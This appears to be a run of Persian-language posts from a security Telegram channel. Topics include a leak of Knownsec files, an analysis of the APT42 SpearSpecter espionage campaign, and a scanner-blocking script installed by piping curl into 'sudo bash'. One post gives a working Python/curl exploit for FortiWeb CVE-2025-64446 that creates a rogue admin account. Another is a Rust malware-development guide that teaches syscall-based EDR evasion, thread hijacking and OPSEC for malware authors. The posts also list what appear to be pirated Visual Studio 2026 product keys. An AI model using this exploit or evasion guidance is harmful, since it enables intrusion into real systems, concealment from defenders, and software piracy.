✅#VMPUnpacker

ظاهرا ابزار جدیدی ( VMPUnpacker ) در فروم‌های چینی معرفی شده که قابل قبول کار میکنه ... ( در محیط آزمایشگاهی تست کنید )

@NullError_ir

✅#hacker_arsenal

T0oLS ...

@NullError_ir

✅#Visual_Studio_2026

Visual Studio 2026 is here
Keys:

Professional: NVTDK-QB8J9-M28GR-92BPC-BTHXK
Enterprise: VYGRN-WPR22-HG4X3-692BF-QGT2V

✅#Knownsec

‼️بزرگترین شرکت امنیت سایبری چین، Knownsec، مورد نفوذ قرار گرفت و جزئیات عملیات سایبری دولت چین فاش شد.

این داده‌ها شامل اسناد سلاح سایبری، کد منبع ابزار هک داخلی و فهرست اهداف جهانی است که بیش از 20 کشور از جمله ژاپن، ویتنام و هند را پوشش می‌دهد.

در یک فایل اکسل، فهرستی از ۸۰ سازمان خارجی هک‌شده، به علاوه‌ی شواهدی از ۹۵ گیگابایت اطلاعات سرقت‌شده‌ی مهاجرتی هندی‌ها و ۳ ترابایت اطلاعات تماس از اپراتور تلفن همراه LG U Plus کره‌ی جنوبی، ارائه شده است.

( در یکی از اسناد به یک پاوربانک مخرب اشاره می‌کند )

۔Knownsec کلید امنیت سایبری چین است و قابلیت‌های دفاعی و تهاجمی پیشرفته، از جمله ابزارهای جاسوسی، را فراهم می‌کند.

✅#MCP

Atomic Red Team MCP Server ...

✅#Obfuscator

نوشتن یک ابزار مبهم‌ساز توسط محقق امنیتی و متخصص مهندسی معکوس خانم ژائو ویتور - ژاپنی .

توسعه ابزار Obfuscator/Deobfuscating از ابتدا ...

@NullError_ir

✅#FortiWeb

CVE-2025-64446 اجرای کد از راه دور بدون احراز هویت در FortiWeb از طریق عبور مسیر و دور زدن احراز هویت CGI
*
*
یعنی بر اساس این
می‌توان چنین چیزی به دست آورد:

python3 - <<'PY'
import base64, json, subprocess
header = base64.b64encode(json.dumps({
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
}).encode()).decode()

payload = json.dumps({
    "data": {
        "q_type": 1,
        "name": "note2",
        "access-profile": "prof_admin",
        "password": "note2",
        "comment": "automated RCE"
    }
})

cmd = [
    "curl", "--path-as-is", "-sk",
    "-H", f"CGIINFO: {header}",
    "-H", "Content-Type: application/json",
    "--data", payload,
    "https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY

خروجی از دستگاه:

{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }

یعنی به سادگی یک ادمین جدید می‌سازیم ...

✅#APT42

تحلیل فنی عملیات جاسوسی SpearSpecter: حمله جدید APT42 علیه اهداف دفاعی و دولتی

گزارش‌ها حاکی از شناسایی یک کمپین جاسوسی سایبری جدید و فعال با نام رمز SpearSpecter است که توسط هکرهای ایرانی مورد حمایت دولت، APT42 (شناخته‌شده با نام‌هایی چون APT35, Charming Kitten, Mint Sandstorm) اجرا شده است.

این کمپین که توسط «آژانس ملی دیجیتال اسرائیل» (INDA) شناسایی شده، از اوایل سپتامبر ۲۰۲۵ فعال بوده و به طور سیستماتیک مقامات ارشد و حساس در بخش‌های دفاعی و دولتی را هدف قرار می‌دهد.

نکته قابل توجه در این عملیات، گسترش سطح حمله به اعضای خانواده اهداف اصلی است. این تاکتیک، یک اهرم فشار روانی و یک مسیر دسترسی جایگزین برای مهاجمان ایجاد می‌کند و نشان‌دهنده سطح بالایی از شخصی‌سازی و جمع‌آوری اطلاعات پیش از حمله است.

جزئیات فنی و زنجیره حمله (Attack Chain)

عملیات SpearSpecter یک حمله چند مرحله‌ای و پیچیده است که ترکیبی از مهندسی اجتماعی و تکنیک‌های فنی پیشرفته را به کار می‌گیرد:

۱. فاز مهندسی اجتماعی :
مهاجمان با استفاده از تاکتیک‌های مهندسی اجتماعی بسیار قانع‌کننده (مانند جعل هویت مخاطبین مورد اعتماد در واتس‌اپ) با اهداف ارتباط برقرار می‌کنند. این ارتباط ممکن است روزها یا هفته‌ها طول بکشد تا اعتماد جلب شود. سپس قربانی را به بهانه‌هایی مانند «ارسال اسناد لازم برای یک جلسه» یا «دعوت به یک کنفرانس معتبر» فریب می‌دهند.

۲. تحویل پی‌لود اولیه:
یک لینک مخرب برای قربانی ارسال می‌شود. پس از کلیک، قربانی وارد یک زنجیره ریدایرکت می‌شود. نکته جالب توجه در این مرحله، سوءاستفاده از پروتکل هندلر search-ms: ویندوز است. این تکنیک به مهاجم اجازه می‌دهد تا یک فایل Windows Shortcut (`.LNK`) را که بر روی یک سرور WebDAV میزبانی شده، در قالب یک فایل PDF جعلی به قربانی نمایش دهد.

۳. اجرای لودر:
هنگامی که قربانی فایل .LNK جعلی را باز می‌کند، این فایل با یک زیردامنه در سرویس Cloudflare Workers ارتباط برقرار کرده و یک Batch Script (اسکریپت دسته‌ای) را به عنوان لودر (Loader) واکشی و اجرا می‌کند.

۴. استقرار بدافزار نهایی :
این لودر در نهایت بدافزار اصلی عملیات، یعنی بک‌دور شناخته‌شده و مبتنی بر PowerShell به نام TAMECAT را اجرا می‌کند.

تحلیل بدافزار TAMECAT

۔TAMECAT یک چارچوب (Framework) ماژولار مبتنی بر PowerShell است که قابلیت‌های گسترده‌ای برای جاسوسی در اختیار مهاجمان قرار می‌دهد:

ویژگی کلیدی: C2 چند کاناله (Multi-Channel C2)
برجسته‌ترین ویژگی TAMECAT، استفاده از سه کانال ارتباطی مجزا برای فرماندهی و کنترل (C2) است. این کار به منظور افزایش پایداری و مقاومت (Resiliency) در برابر شناسایی و مسدودسازی انجام می‌شود:

1۔ HTTPS: کانال استاندارد برای ارتباط.

2۔ Discord: استفاده از Webhook URL سرویس دیسکورد برای ارسال اطلاعات اولیه سیستم قربانی و دریافت دستورات از یک کانال مشخص.

3۔ Telegram: بدافزار به دستورات ورودی از یک بات تلگرامی که تحت کنترل مهاجم است، گوش می‌دهد و کدهای PowerShell بیشتری را از زیردامنه‌های Cloudflare Workers دریافت و اجرا می‌کند.

قابلیت‌های جاسوسی:

* انجام شناسایی (Reconnaissance) دقیق از سیستم قربانی.

* جمع‌آوری و سرقت فایل‌ها بر اساس پسوندهای خاص.

* سرقت داده‌ها از مرورگرها (مانند Google Chrome و Microsoft Edge).

* جمع‌آوری و استخراج صندوق‌های پستی (Mailboxes) نرم‌افزار Outlook.

* عکس‌برداری از صفحه نمایش (Screenshots) در فواصل زمانی کوتاه (مثلاً هر ۱۵ ثانیه).

کانال‌های استخراج داده (Exfiltration):

داده‌های سرقت شده از طریق پروتکل‌های HTTPS یا FTP به زیرساخت مهاجم منتقل می‌شوند.

تکنیک‌های گریز از شناسایی (Evasion Techniques)

۔APT42 در این عملیات از مجموعه‌ای از تکنیک‌های پیشرفته برای پنهان‌کاری استفاده کرده است:

۔* اجرا در حافظه (In-Memory): بدافزار عمدتاً در حافظه اجرا می‌شود تا ردپای کمتری روی دیسک باقی بگذارد (Fileless).

۔* استفاده از LOLBins: بهره‌گیری از باینری‌های قانونی خود سیستم‌عامل (Living-off-the-Land Binaries) برای پنهان کردن فعالیت‌های مخرب.

۔* رمزگذاری: رمزگذاری تله‌متری و پی‌لودهای کنترلی برای جلوگیری از تحلیل ترافیک.

۔* Obfuscation: مبهم‌سازی سورس کد PowerShell.

۔* زیرساخت ترکیبی: استفاده هوشمندانه از سرویس‌های ابری قانونی و معتبر (Cloudflare Workers, Discord, Telegram) در کنار منابع تحت کنترل مهاجم. این کار شناسایی ترافیک C2 را بسیار دشوار می‌کند، زیرا در میان ترافیک عادی شبکه پنهان می‌شود.

@NullError_ir

✅#PublicGuard

محافظت از سرویس‌های شما در برابر اسکنرهای عمومی.

این پروژه آدرس‌های IP پلتفرم‌ها و سرویس‌های محبوب تهدیدشناسی (Threat Intelligence) و جمع‌آوری داده‌ها (Shodan، Censys، ZoomEye، FOFA، BinaryEdge و غیره) را مسدود می‌کند تا محیط‌های تست و توسعه شما به طور تصادفی در پایگاه داده‌های آن‌ها قرار نگیرند.

⚙️ نصب ساده با یک دستور:

curl -fsSL https://raw.githubusercontent.com/cleverg0d/PublicGuard/main/block_scanners.sh | sudo bash

🔗 مخزن: github.com/cleverg0d/PublicGuard

✅#Rust_Malware

توسعه بدافزار با معماری Rust؛ کابوس تحلیلگران بدافزار و عبور از مرزهای تحلیل سنتی و Evasion مدرن

در اکوسیستم توسعه بدافزار، زبان‌های C++/C همچنان حاکم هستند، اما در عملیات‌های پیشرفته APT و باج‌افزارهای مدرن (مانند BlackCat/ALPHV)، شاهد یک تغییر پارادایم تهاجمی به سمت Rust هستیم.

این مطلب به کالبدشکافی فنی این موضوع می‌پردازد که چرا Rust به سلاح جدید Red Teamerها تبدیل شده و چگونه می‌توان با ترکیب Direct Syscalls و معماری no_std ، کابوسی برای تحلیلگران و EDRها خلق کرد.

چرا Rust؟ فراتر از Memory Safety

مهاجرت به Rust در دنیای بدافزار بر پایه دو اصل استوار است:

1. هزینه سربار تحلیل (Analysis Overhead): تحلیل باینری‌های Rust به دلیل ساختار منحصر‌به‌فرد کامپایلر و مدیریت حافظه، به مراتب پیچیده‌تر از ++C است.

2. امضای رفتاری جدید (Novel Signatures): بسیاری از الگوریتم‌های Heuristic که برای شناسایی الگوهای کامپایلرهای MSVC یا MinGW آموزش دیده‌اند، در برابر ساختار LLVM-based و کدهای Rust دچار خطا می‌شوند.

چالش‌های مهندسی معکوس (Reverse Engineering)

اگر خروجی Decompiler ابزاری مثل Ghidra یا IDA Pro را بررسی کنیم، با چالش‌های جدی روبرو هستیم:

* کابوس Function Inlining: کامپایلر rustc در opt-level=3 یا z ، تهاجمی عمل کرده و مرز توابع را از بین می‌برد.

* پیچیدگی Control Flow Graph: کدهای مربوط به Result و Option (مدیریت خطا) و Panic handling ، گراف جریان برنامه را پر از نویز می‌کنند که تشخیص منطق اصلی (Business Logic) را دشوار می‌سازد.

*۔ Symbol Mangling: حتی با وجود ابزارهای Demangling، نام‌گذاری توابع در Rust طولانی و شامل Hashهای منحصر‌به‌فرد است.

هنر کاهش حجم و اختفا: معماری no_std

یکی از نقدهای وارد بر Rust، حجم بالای باینری به دلیل لینک شدن استاتیک std است (حدود ۱۵۰ کیلوبایت برای یک Hello World).

راهکار سطح APT: استفاده از no_std.

در این حالت، توسعه‌دهنده بدافزار دسترسی به کتابخانه استاندارد را قطع کرده و مستقیماً با libc یا WinAPI صحبت می‌کند. نتیجه؟

* کاهش حجم باینری به زیر ۲۰ کیلوبایت.

* حذف کدهای اضافه (Dead Code) و کاهش سطح حمله برای Signature Detection.

کارگاه عملی: Dropper مدرن با تکنیک Syscalls

در این سناریو، به جای استفاده از APIهای مانیتور شده (مانند VirtualAlloc یا CreateRemoteThread که هوک شده‌اند)، از Indirect Syscalls استفاده می‌کنیم.

مرحله ۱: جمع‌آوری اطلاعات و Obfuscation

استفاده از Crateهایی مانند obfstr برای رمزنگاری رشته‌ها در زمان کامپایل (Compile-time Hashing) تا تحلیل استاتیک و دستور strings هیچ اطلاعات مفیدی ندهد.

مرحله ۲: دور زدن User-mode Hooks

به جای فراخوانی توابع kernel32.dll ، ما مستقیماً ntdll.dll را پارس کرده و شماره Syscall (SSN) توابع حیاتی مانند NtAllocateVirtualMemory را استخراج می‌کنیم.

تکنیک Halo’s Gate / Tartarus:

با استفاده از اسمبلی مستقیم در Rust (global_asm!)، تابع را فراخوانی می‌کنیم. بدین ترتیب EDR که روی توابع Win32 هوک گذاشته است، کاملاً کور می‌شود.

// Conceptual Syscall invocation in Rust
unsafe {
    let status = syscall!(
        NtAllocateVirtualMemory,
        process_handle,
        &mut base_addr,
        0,
        &mut region_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READ
    );
}

مرحله ۳: اجرای بدون Thread جدید

ساخت CreateRemoteThread بسیار پر سروصداست. راهکار جایگزین:

1۔ Thread Hijacking: متوقف کردن یک ترد موجود، تغییر RIP به آدرس شل‌کد و ادامه اجرا.

2۔ Callback Injection: استفاده از توابعی که Callback می‌پذیرند (مانند TpAllocWork در Thread Pool) برای اجرای پیلود در بستری کاملاً قانونی.

نکات حیاتی OPSEC در Rust

1. مسیرهای افشاگر: Rust مسیرهای مطلق سیستم بیلد (مانند C:\Users\Attacker\.cargo\...) را در باینری نگه می‌دارد. حتماً از فلگ --remap-path-prefix در زمان کامپایل استفاده کنید.

2. کتابخانه شبکه: هرگز از reqwest استفاده نکنید (حجم بالا + TLS Fingerprint). از FFI برای فراخوانی WinHTTP یا سوکت‌های خام استفاده کنید.

3۔ Panic = Death: در بدافزار، panic باید منجر به abort بی‌صدا شود. کدهای خطای پیش‌فرض Rust اطلاعات زیادی را در کنسول یا لاگ سیستم نشت می‌دهند.